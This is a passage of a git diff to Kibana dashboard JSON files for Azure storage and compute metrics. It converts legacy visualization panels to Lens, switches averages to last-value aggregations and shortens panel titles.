"circle", - "gauge_width": "10", - "hide_last_value_indicator": true, - "id": "61fb4190-32e4-11ea-b9f8-4d0b340ad993", - "index_pattern": "metrics-*", - "interval": "60m", - "isModelInvalid": false, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "rgba(104,188,0,1)", - "fill": "1.2", - "filter": { - "language": "kuery", - "query": "" - }, - "formatter": "'0'", - "id": "61fb4191-32e4-11ea-b9f8-4d0b340ad993", - "label": "Container Count", - "line_width": 2, - "metrics": [ - { - "field": "azure.storage_account.container_count.avg", - "id": "61fb4192-32e4-11ea-b9f8-4d0b340ad993", - "type": "avg" - } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "gradient", - "split_mode": "everything", - "stacked": "none", - "terms_field": "azure.resource.name", - "terms_order_by": "61fb4192-32e4-11ea-b9f8-4d0b340ad993", - "type": "timeseries", - "value_template": "{{value}}" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "gauge", - "use_kibana_indexes": false, - "drop_last_bucket": 1 + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2145e43c-e9ba-4cb2-9d0f-988e3f3febcd" + ], + "layerId": "a88483ec-4907-4b37-932e-c8f321dd4e0f", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "splitAccessor": "fd2e7314-5a94-49b1-95b1-c0459f6399b0", + "xAccessor": "7d007119-a64e-4bb9-b766-c98e88020f08", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(0,149,177,1)", + "forAccessor": "2145e43c-e9ba-4cb2-9d0f-988e3f3febcd" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } - } - }, - { - "version": "8.3.0", - "type": "visualization", + "title": "Storage Account Egress Traffic", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, "gridData": { "h": 14, "i": "a715fafc-ca38-410c-9253-12ba506eabc0", - "w": 20, - "x": 9, - "y": 24 + "w": 24, + "x": 0, + "y": 29 }, "panelIndex": "a715fafc-ca38-410c-9253-12ba506eabc0", + "title": "Egress Traffic by APIName", + "type": "lens", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Account Egress Traffic [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "background_color_rules": [ - { - "id": "0791c5a0-32d8-11ea-98d2-1194b9f2bfc0" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": true, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" } - ], - "bar_color_rules": [ + }, + "datasourceStates": { + "formBased": { + "layers": { + "ba544caa-968e-43a4-ad08-778383139364": { + "columnOrder": [ + "08d7ec3c-6bc4-4327-b957-128f9af2c893", + "8b3a854f-c648-4b43-96f6-e3c5fdc02aae", + "cbf67182-5598-4083-9e67-f0118755f9e2" + ], + "columns": { + "08d7ec3c-6bc4-4327-b957-128f9af2c893": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "8b3a854f-c648-4b43-96f6-e3c5fdc02aae": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.dimensions.api_name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "cbf67182-5598-4083-9e67-f0118755f9e2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.dimensions.api_name" + }, + "cbf67182-5598-4083-9e67-f0118755f9e2": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Storage Accounts Ingress Total", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes" + } + }, + "scale": "ratio", + "sourceField": "azure.storage_account.ingress.total" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ { - "id": "fca016e0-32de-11ea-a435-e7199eba380d" + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-ba544caa-968e-43a4-ad08-778383139364", + "type": "index-pattern" } ], - "filter": { + "query": { "language": "kuery", "query": "" }, - "gauge_color_rules": [ - { - "id": "fb8be7c0-32de-11ea-a435-e7199eba380d" - } - ], - "gauge_inner_width": 10, - "gauge_style": "half", - "gauge_width": 10, - "id": "f0edca80-32d5-11ea-b19d-fb5049b980ca", - "index_pattern": "metrics-*", - "interval": "5m", - "isModelInvalid": false, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "rgba(0,149,177,1)", - "fill": 0, - "filter": { - "language": "kuery", - "query": "" - }, - "formatter": "bytes", - "hidden": false, - "id": "f0edf190-32d5-11ea-b19d-fb5049b980ca", - "label": "Storage Accounts Egress Total", - "line_width": 2, - "metrics": [ - { - "field": "azure.storage_account.egress.total", - "id": "f0edf191-32d5-11ea-b19d-fb5049b980ca", - "type": "max" - } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "gradient", - "split_filters": [ - { - "color": "rgba(0,98,177,1)", - "filter": { - "language": "kuery", - "query": "" - }, - "id": "283dc410-32d9-11ea-98d2-1194b9f2bfc0" - } - ], - "split_mode": "terms", - "stacked": "none", - "terms_field": "azure.dimensions.api_name", - "terms_order_by": "f0edf191-32d5-11ea-b19d-fb5049b980ca", - "type": "timeseries", - "value_template": "{{value}}" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "timeseries", - "use_kibana_indexes": false, - "drop_last_bucket": 1 + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "cbf67182-5598-4083-9e67-f0118755f9e2" + ], + "layerId": "ba544caa-968e-43a4-ad08-778383139364", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "splitAccessor": "8b3a854f-c648-4b43-96f6-e3c5fdc02aae", + "xAccessor": "08d7ec3c-6bc4-4327-b957-128f9af2c893", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(104,188,0,1)", + "forAccessor": "cbf67182-5598-4083-9e67-f0118755f9e2" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } + "title": "Storage Account Ingress Traffic", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - "title": "Egress Traffic by APIName" - }, - { - "version": "8.3.0", - "type": "visualization", "gridData": { "h": 14, "i": "75f72920-be71-47a9-a967-f1c862ab2961", - "w": 19, - "x": 29, - "y": 24 + "w": 24, + "x": 24, + "y": 29 }, "panelIndex": "75f72920-be71-47a9-a967-f1c862ab2961", - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Account Ingress Traffic [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "background_color_rules": [ - { - "id": "0791c5a0-32d8-11ea-98d2-1194b9f2bfc0" - } - ], - "bar_color_rules": [ - { - "id": "fca016e0-32de-11ea-a435-e7199eba380d" - } - ], - "filter": { - "language": "kuery", - "query": "" - }, - "gauge_color_rules": [ - { - "id": "fb8be7c0-32de-11ea-a435-e7199eba380d" - } - ], - "gauge_inner_width": 10, - "gauge_style": "half", - "gauge_width": 10, - "id": "f0edca80-32d5-11ea-b19d-fb5049b980ca", - "index_pattern": "metrics-*", - "interval": "5m", - "isModelInvalid": false, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "rgba(104,188,0,1)", - "fill": 0, - "filter": { - "language": "kuery", - "query": "" - }, - "formatter": "bytes", - "hidden": false, - "id": "f0edf190-32d5-11ea-b19d-fb5049b980ca", - "label": "Storage Accounts Ingress Total", - "line_width": 2, - "metrics": [ - { - "field": "azure.storage_account.ingress.total", - "id": "f0edf191-32d5-11ea-b19d-fb5049b980ca", - "type": "max" - } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "gradient", - "split_filters": [ - { - "color": "rgba(0,98,177,1)", - "filter": { - "language": "kuery", - "query": "" - }, - "id": "283dc410-32d9-11ea-98d2-1194b9f2bfc0" - } - ], - "split_mode": "terms", - "stacked": "none", - "terms_field": "azure.dimensions.api_name", - "terms_order_by": "f0edf191-32d5-11ea-b19d-fb5049b980ca", - "type": "timeseries", - "value_template": "{{value}}" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "timeseries", - "use_kibana_indexes": false, - "drop_last_bucket": 1 - }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } - }, - "title": "Ingress Traffic by APIName" + "title": "Ingress Traffic by APIName", + "type": "lens", + "version": "8.7.0" } ], "timeRestore": false, "title": "[Azure Metrics] Blob Storage Overview", "version": 1 }, + "coreMigrationVersion": "8.7.0", + "created_at": "2024-04-01T13:06:26.269Z", + "id": "azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc", + "migrationVersion": { + "dashboard": "8.7.0" + }, "references": [ { "id": "metrics-*", @@ -1015,23 +1641,20 @@ "type": "index-pattern" }, { - "type": "index-pattern", - "name": "ff6441f8-d66d-4399-bae5-25d3d861b299:control_0_index_pattern", - "id": "metrics-*" + "id": "metrics-*", + "name": "controlGroup_7eb82f60-7b2e-473f-960b-35b3fa5392d5:optionsListDataView", + "type": "index-pattern" }, { - "type": "index-pattern", - "name": "ff6441f8-d66d-4399-bae5-25d3d861b299:control_1_index_pattern", - "id": "metrics-*" + "id": "metrics-*", + "name": "controlGroup_269e473e-2b24-402e-9721-3c9b3bd85458:optionsListDataView", + "type": "index-pattern" }, { - "type": "index-pattern", - "name": "ff6441f8-d66d-4399-bae5-25d3d861b299:control_2_index_pattern", - "id": "metrics-*" + "id": "metrics-*", + "name": "controlGroup_192cb16e-8bf4-4e63-b95c-338b8fc0fcfa:optionsListDataView", + "type": "index-pattern" } ], - "migrationVersion": { - "dashboard": "8.3.0" - }, - "coreMigrationVersion": "8.3.0" + "type": "dashboard" } \ No newline at end of file diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc.json index aa4a43f0884..55081c6f8a3 100644 --- a/packages/azure_metrics/kibana/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc.json +++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc.json @@ -49,6 +49,7 @@ { "embeddableConfig": { "enhancements": {}, + "hidePanelTitles": false, "savedVis": { "data": { "aggs": [], @@ -66,7 +67,7 @@ "markdown": "### Azure Storage\n\n[Overview](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [Blob](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [**File**](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [Table](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [Queue](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", "openLinksInNewTab": false }, - "title": "Navigation File Storage Overview [Azure Metrics]", + "title": "Navigation File Storage Overview", "type": "markdown", "uiState": {} } @@ -79,6 +80,7 @@ "y": 0 }, "panelIndex": "ee131d2d-7ab5-4434-9e3b-230759c3e5ff", + "title": "Navigation File Storage Overview", "type": "visualization", "version": "8.7.0" }, @@ -114,10 +116,10 @@ "12c42888-d32f-44da-a61d-84c1f18bdeef": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.file_capacity.avg))", + "label": "overall_max(last_value(azure.storage_account.file_capacity.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.file_capacity.avg))", + "formula": "overall_max(last_value(azure.storage_account.file_capacity.avg))", "isFormulaBroken": false }, "references": [ @@ -128,11 +130,15 @@ "12c42888-d32f-44da-a61d-84c1f18bdeefX0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.file_capacity.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.file_capacity.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.file_capacity.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.file_capacity.avg" @@ -141,7 +147,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.file_capacity.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.file_capacity.avg))", "operationType": "overall_max", "references": [ "12c42888-d32f-44da-a61d-84c1f18bdeefX0" @@ -157,12 +163,12 @@ }, "isBucketed": false, "label": "File Capacity", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "bytes" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.file_capacity.avg" @@ -196,7 +202,7 @@ "metricAccessor": "84db5c1c-ec68-45ed-a47e-28cffd3de24a" } }, - "title": "Storage File Capacity [Azure Metrics] (converted)", + "title": "Storage File Capacity", "type": "lens", "visualizationType": "lnsMetric" }, @@ -211,7 +217,7 @@ "y": 5 }, "panelIndex": "b24e3e0d-a748-4bb9-ad71-e0de392e2696", - "title": "Storage File Capacity [Azure Metrics]", + "title": "Storage File Capacity", "type": "lens", "version": "8.7.0" }, @@ -253,12 +259,12 @@ }, "isBucketed": false, "label": "File Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.file_count.avg" @@ -266,10 +272,10 @@ "9f5ac963-172f-4634-9a08-251dffc2537d": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.file_count.avg))", + "label": "overall_max(last_value(azure.storage_account.file_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.file_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.file_count.avg))", "isFormulaBroken": false }, "references": [ @@ -280,11 +286,15 @@ "9f5ac963-172f-4634-9a08-251dffc2537dX0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.file_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.file_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.file_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.file_count.avg" @@ -293,7 +303,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.file_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.file_count.avg))", "operationType": "overall_max", "references": [ "9f5ac963-172f-4634-9a08-251dffc2537dX0" @@ -329,7 +339,7 @@ "metricAccessor": "23858a4e-1e42-4904-83a2-ed6e49295ba2" } }, - "title": "Storage File Count [Azure Metrics] (converted)", + "title": "Storage File Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -344,7 +354,7 @@ "y": 5 }, "panelIndex": "8131dfcd-2c52-4641-8259-2f4f2e7558d0", - "title": "Storage File Count [Azure Metrics]", + "title": "Storage File Count", "type": "lens", "version": "8.7.0" }, @@ -380,10 +390,10 @@ "062f829c-7c18-40ba-8284-fd5a58c25a8a": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.file_share_count.avg))", + "label": "overall_max(last_value(azure.storage_account.file_share_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.file_share_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.file_share_count.avg))", "isFormulaBroken": false }, "references": [ @@ -394,11 +404,15 @@ "062f829c-7c18-40ba-8284-fd5a58c25a8aX0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.file_share_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.file_share_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.file_share_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.file_share_count.avg" @@ -407,7 +421,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.file_share_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.file_share_count.avg))", "operationType": "overall_max", "references": [ "062f829c-7c18-40ba-8284-fd5a58c25a8aX0" @@ -423,12 +437,12 @@ }, "isBucketed": false, "label": "File Share Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.file_share_count.avg" @@ -462,7 +476,7 @@ "metricAccessor": "22f058a6-1825-4063-8158-d90762047b37" } }, - "title": "Storage File Share Count [Azure Metrics] (converted)", + "title": "Storage File Share Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -477,7 +491,7 @@ "y": 5 }, "panelIndex": "49233089-be1d-4cda-9ccf-2815152e1016", - "title": "Storage File Share Count [Azure Metrics]", + "title": "Storage File Share Count", "type": "lens", "version": "8.7.0" }, @@ -511,18 +525,22 @@ "a7b1928f-ce2c-43ff-b945-a6b419d9b760": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.availability.avg: *" + }, "isBucketed": false, "label": "Availability", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " %" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.availability.avg" @@ -535,7 +553,7 @@ "params": { "dropPartials": false, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -626,7 +644,7 @@ "yRightScale": "linear" } }, - "title": "Storage Availability [Azure Metrics] (converted)", + "title": "Storage Availability", "type": "lens", "visualizationType": "lnsXY" }, @@ -707,7 +725,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -811,7 +829,7 @@ "yRightScale": "linear" } }, - "title": "Storage Transactions [Azure Metrics] (converted)", + "title": "Storage Transactions", "type": "lens", "visualizationType": "lnsXY" }, @@ -862,10 +880,10 @@ "9d4a0ed0-f231-4462-a164-0babab6e282b": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.file_share_snapshot_count.avg))", + "label": "overall_max(last_value(azure.storage_account.file_share_snapshot_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.file_share_snapshot_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.file_share_snapshot_count.avg))", "isFormulaBroken": false }, "references": [ @@ -876,11 +894,15 @@ "9d4a0ed0-f231-4462-a164-0babab6e282bX0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.file_share_snapshot_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.file_share_snapshot_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.file_share_snapshot_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.file_share_snapshot_count.avg" @@ -889,7 +911,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.file_share_snapshot_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.file_share_snapshot_count.avg))", "operationType": "overall_max", "references": [ "9d4a0ed0-f231-4462-a164-0babab6e282bX0" @@ -905,12 +927,12 @@ }, "isBucketed": false, "label": "File Share Snapshot Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.file_share_snapshot_count.avg" @@ -944,7 +966,7 @@ "metricAccessor": "a9cc5858-41b5-4dc6-a06f-8a2c20f56190" } }, - "title": "Storage File Share Snapshot Count [Azure Metrics] (converted)", + "title": "Storage File Share Snapshot Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -959,7 +981,7 @@ "y": 14 }, "panelIndex": "2d5c6c0f-f4d2-44fb-b7e5-1a855b75e40f", - "title": "Storage File Share Snapshot Count [Azure Metrics]", + "title": "Storage File Share Snapshot Count", "type": "lens", "version": "8.7.0" }, @@ -994,18 +1016,22 @@ "05ccf6a0-2c96-4739-9d44-605c279562f4": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_server_latency.avg: *" + }, "isBucketed": false, "label": "SuccessServerLatency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_server_latency.avg" @@ -1044,7 +1070,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1136,7 +1162,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success Server Latency [Azure Metrics] (converted)", + "title": "Storage Success Server Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1191,7 +1217,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1225,18 +1251,22 @@ "8376a8a7-8690-48eb-9db1-adec8860c89a": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_e2elatency.avg: *" + }, "isBucketed": false, "label": "Success E2E Latency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_e2elatency.avg" @@ -1328,7 +1358,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success E2E Latency [Azure Metrics] (converted)", + "title": "Storage Success E2E Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1385,12 +1415,12 @@ }, "isBucketed": false, "label": "File Share Snapshot Size", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "bytes" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.file_share_snapshot_size.avg" @@ -1398,10 +1428,10 @@ "a67f2ce4-fc3a-4924-a5f5-c96e4474d4f3": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.file_share_snapshot_size.avg))", + "label": "overall_max(last_value(azure.storage_account.file_share_snapshot_size.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.file_share_snapshot_size.avg))", + "formula": "overall_max(last_value(azure.storage_account.file_share_snapshot_size.avg))", "isFormulaBroken": false }, "references": [ @@ -1412,11 +1442,15 @@ "a67f2ce4-fc3a-4924-a5f5-c96e4474d4f3X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.file_share_snapshot_size.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.file_share_snapshot_size.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.file_share_snapshot_size.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.file_share_snapshot_size.avg" @@ -1425,7 +1459,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.file_share_snapshot_size.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.file_share_snapshot_size.avg))", "operationType": "overall_max", "references": [ "a67f2ce4-fc3a-4924-a5f5-c96e4474d4f3X0" @@ -1461,7 +1495,7 @@ "metricAccessor": "19e57c7d-acf6-4e08-b599-0269fa62707f" } }, - "title": "Storage File Share Snapshot Size [Azure Metrics] (converted)", + "title": "Storage File Share Snapshot Size", "type": "lens", "visualizationType": "lnsMetric" }, @@ -1476,7 +1510,7 @@ "y": 22 }, "panelIndex": "c6792441-37b6-4ef4-ad8b-21f137b2f0b4", - "title": "Storage File Share Snapshot Size [Azure Metrics]", + "title": "Storage File Share Snapshot Size", "type": "lens", "version": "8.7.0" }, @@ -1542,7 +1576,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1656,7 +1690,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Ingress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Ingress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1711,7 +1745,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1851,7 +1885,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Egress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Egress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1876,7 +1910,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.0", - "created_at": "2023-09-01T05:23:11.892Z", + "created_at": "2024-03-29T10:14:46.025Z", "id": "azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc", "migrationVersion": { "dashboard": "8.7.0" diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-eb3f05f0-ea9a-11e9-90ec-112a988266d5.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-eb3f05f0-ea9a-11e9-90ec-112a988266d5.json index 55fb2955fbb..9f7da8e0969 100644 --- a/packages/azure_metrics/kibana/dashboard/azure_metrics-eb3f05f0-ea9a-11e9-90ec-112a988266d5.json +++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-eb3f05f0-ea9a-11e9-90ec-112a988266d5.json @@ -42,7 +42,7 @@ "markdown": "### Azure Compute VM \n\n[**Overview**](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [Guest Windows VM Metrics](#/dashboard/azure_metrics-b6b434c0-feae-11eb-8fff-87871c582eca) | [Guest Linux VM Metrics](#/dashboard/azure_metrics-d8e3c5f0-feaf-11eb-8fff-87871c582eca)", "openLinksInNewTab": false }, - "title": "Navigation Compute VM Overview [Azure Metrics]", + "title": "Navigation Compute VM Overview", "type": "markdown", "uiState": {} } @@ -1133,7 +1133,7 @@ "y": 18 }, "panelIndex": "14e225ef-6417-4377-b2cb-6b46b6693b78", - "title": "VM Disk Reads [Azure Metrics]", + "title": "VM Disk Reads", "type": "lens", "version": "8.4.0" }, diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc.json index 15c0d6e2df2..ae9adf4e7b4 100644 --- a/packages/azure_metrics/kibana/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc.json +++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc.json @@ -49,6 +49,7 @@ { "embeddableConfig": { "enhancements": {}, + "hidePanelTitles": false, 